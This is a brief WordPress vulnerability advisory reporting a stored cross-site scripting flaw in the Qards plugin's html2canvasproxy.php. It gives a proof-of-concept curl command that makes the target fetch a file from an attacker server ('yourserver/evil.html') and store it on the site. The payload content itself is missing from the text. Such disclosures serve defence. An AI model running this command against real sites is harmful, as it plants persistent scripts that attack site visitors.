Qards - Stored Cross-Site Scripting (XSS)

Type wpvulndb
Reporter theMiddle
Modified 2019-11-28T00:00:00


WordPress Vulnerability - Qards - Stored Cross-Site Scripting (XSS) The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as following: . On a web server with "Directory Listing" enabled, you could easily find that file. Due to improper sanitization, the generated file, suffer from a persistent XSS vulnerability. POC: 1. create a remote file (evil.html), on your webserver, with the following content: 2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html' 3. Browse to http://target/wp-content/plugins/qards/images/ to get the file